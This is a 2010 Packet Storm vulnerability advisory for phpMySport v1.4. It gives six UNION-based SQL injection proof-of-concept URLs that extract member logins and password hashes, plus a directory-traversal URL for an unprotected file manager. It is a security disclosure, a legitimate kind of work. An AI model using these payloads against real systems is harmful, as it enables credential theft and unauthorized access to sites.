phpMySport 1.4 SQL Injection

2010-01-18T00:00:00
ID PACKETSTORM:85338
Type packetstorm
Reporter Amol Naik
Modified 2010-01-18T00:00:00

Description

                                        
                                            `#######################################################################  
Multiple Vulnerabilities in phpMySport v1.4  
  
Name Multiple Vulnerabilities in phpMySport  
Systems Affected phpMySport v1.4  
site http://phpmysport.sourceforge.net/en/  
Author Amol Naik (amolnaik4[at]gmail.com)  
Date 18/01/2010  
#######################################################################  
  
  
############  
OVERVIEW  
############  
  
phpMySport v1.4 is vulnerable to following issues:  
  
1. Multiple SQL Injection  
2. Unprotected Access to File Manager  
  
####################  
Technical Details  
####################  
  
1. Multiple SQL Injection:  
  
Multiple SQL Injection instances exist in phpmysport v1.4 when "magic_quotes_gpc = OFF".  
  
PoC:  
+++++  
  
http://localhost/phpmysport/index.php?r=member&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,concat(member_login,0x3a,member_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+pms_member--+-  
  
http://localhost/phpmysport/index.php?r=news&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,concat(member_login,0x3a,member_pass),8,9,10,11,12,13,14,15,16,17+from+pms_member--+-  
  
http://localhost/phpmysport/index.php?r=information&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,concat(member_login,0x3a,member_pass),9,10,11,12,13,14,15,16,17,18,19+from+pms_member--+-  
  
http://localhost/phpmysport/index.php?r=team&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,concat(member_login,0x3a,member_pass),6,7,8+from+pms_member--+-  
  
http://localhost/phpmysport/index.php?r=club&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,concat(member_login,0x3a,member_pass),5,6,7,8,9,10,11,12,13,14+from+pms_member--+-  
  
http://localhost/phpmysport/index.php?r=matches&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(member_login,0x3a,member_pass),20,21,22,23,24,25,26,27,28+from+pms_member--+-  
  
  
  
2. Unprotected Access to File Manager:  
  
Access to File manager is unprotected and by using dot-dot-slash (/../../), it is possible to view directory structure of the target system.  
  
PoC:  
+++++  
  
http://localhost/phpmysport/index.php?r=file&v1=file_manager&current_folder=/../../../&fen=pop  
  
  
#############  
TimeLine  
#############  
  
Bug Discovered: 01/01/2010  
Informed Vendor: 09/01/2010 -- no response received  
Public Disclosure: 18/01/2010  
`